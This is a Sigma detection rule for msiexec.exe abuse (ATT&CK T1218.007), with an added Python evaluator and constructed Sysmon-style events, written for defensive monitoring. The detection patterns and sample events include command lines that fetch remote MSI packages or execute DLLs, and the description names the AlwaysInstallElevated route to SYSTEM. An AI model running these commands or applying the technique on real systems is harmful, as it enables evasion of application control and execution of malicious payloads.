title: Msiexec (T1218.007)
id: df00tech-t1218-007
status: experimental
description: "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is commonly associated with executing installation packages (.msi). Since it is a signed Microsoft binary, msiexec.exe can bypass application control solutions. Adversaries use it to launch local or remote MSI files and to execute DLLs. Execution may also be elevated to SYSTEM if the AlwaysInstallElevated policy is enabled. Widely abused by malware families including QakBot, IcedID, Emotet, Clop, Maze, Ragnar Locker, Latrodectus, Raspberry Robin, TA505, Rancor, ZIRCONIUM, and many others."
references:
  - https://attack.mitre.org/techniques/T1218/007/
  - https://df00tech.com/detections/T1218.007
author: df00tech
date: 2026/04/13
tags:
  - attack.t1218.007
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # The full df00tech logic could not be auto-translated (see the KQL/SPL query on df00tech).
  # The selections below scope the rule to the behaviour named in the description
  # (remote MSI payloads and DLL execution) instead of matching every process_creation event.
  selection_img:
    Image|endswith: '\msiexec.exe'
  selection_remote:
    CommandLine|contains:
      - 'http://'
      - 'https://'
  selection_dll:
    # /y and /z make msiexec load a DLL and call DllRegisterServer / DllUnregisterServer
    CommandLine|contains:
      - ' /y'
      - ' /z'
      - ' -y'
      - ' -z'
  condition: selection_img and (selection_remote or selection_dll)
falsepositives:
  - "Legitimate software deployment via SCCM, Intune, or PDQ Deploy which frequently calls msiexec.exe with /quiet or /passive flags"
  - System updates and Windows Update installation processes that use msiexec.exe with silent flags
  - IT administrators manually installing software packages with administrative flags
  - Software auto-update mechanisms that download and install MSI packages remotely
level: high
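The following Python is an added example, not part of the df00tech rule or its KQL/SPL query. It expresses the same detection idea (msiexec.exe launching a remote MSI or executing a DLL via the /y and /z switches) as a small evaluator that can be run offline against constructed Sysmon-style process_creation events, applies the deployment-tool suppression the falsepositives section describes, and checks the AlwaysInstallElevated policy pair mentioned in the description. The field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the allowlist of deployment parent processes and all sample events are assumptions constructed for the example.

```python
"""T1218.007 msiexec.exe triage helper (added example, not df00tech code)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Indicators from the rule description: remote MSI payloads and DLL execution.
REMOTE_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# msiexec /y <dll> calls DllRegisterServer, /z <dll> calls DllUnregisterServer.
DLL_SWITCH_RE = re.compile(r"(?:^|\s)[/-][yz]\b", re.IGNORECASE)
# Silent/passive installs are the norm for sanctioned deployment tooling.
QUIET_RE = re.compile(r"(?:^|\s)[/-](?:q[nb]?|quiet|passive)\b", re.IGNORECASE)

# Assumed allowlist of deployment agents (CcmExec.exe is the SCCM client);
# tune per environment, this is not part of the rule.
DEPLOYMENT_PARENTS = {"ccmexec.exe"}


@dataclass
class Finding:
    image: str
    reasons: list[str]
    suppressed_by: Optional[str] = None  # parent that justified suppression


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding for an msiexec.exe event with T1218.007 indicators, else None."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    cmd = event.get("CommandLine", "")
    reasons = []
    if REMOTE_RE.search(cmd):
        reasons.append("remote_payload")
    if DLL_SWITCH_RE.search(cmd):
        reasons.append("dll_execution")
    if not reasons:
        return None
    parent = basename(event.get("ParentImage", ""))
    # Suppress only when a known deployment agent drives a quiet install.
    suppressed = parent if parent in DEPLOYMENT_PARENTS and QUIET_RE.search(cmd) else None
    return Finding(event["Image"], reasons, suppressed)


def alerts(events: list[dict]) -> list[Finding]:
    """Findings that survive the deployment-tool suppression."""
    return [f for f in map(evaluate, events) if f and f.suppressed_by is None]


def always_install_elevated(registry: dict[str, int]) -> bool:
    """True only when BOTH policy values are 1; then MSI packages run as SYSTEM."""
    keys = (
        r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated",
        r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated",
    )
    return all(registry.get(k) == 1 for k in keys)


# Constructed sample events (not real telemetry); .invalid domains are reserved.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i http://example.invalid/update.msi /qn",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /y C:\Users\Public\helper.dll",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\ccmcache\a1\app.msi /quiet",
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i https://cdn.example.invalid/agent.msi /quiet",
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe"},
]

if __name__ == "__main__":
    for f in alerts(SAMPLE_EVENTS):
        print(f"ALERT {f.image}: {', '.join(f.reasons)}")
```

The third sample (a local package installed from the SCCM cache) never produces a finding because it carries neither indicator, while the fourth is a finding that the suppression rule hides; keeping suppressed findings distinguishable from non-matches lets you audit the allowlist later rather than losing the events outright.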
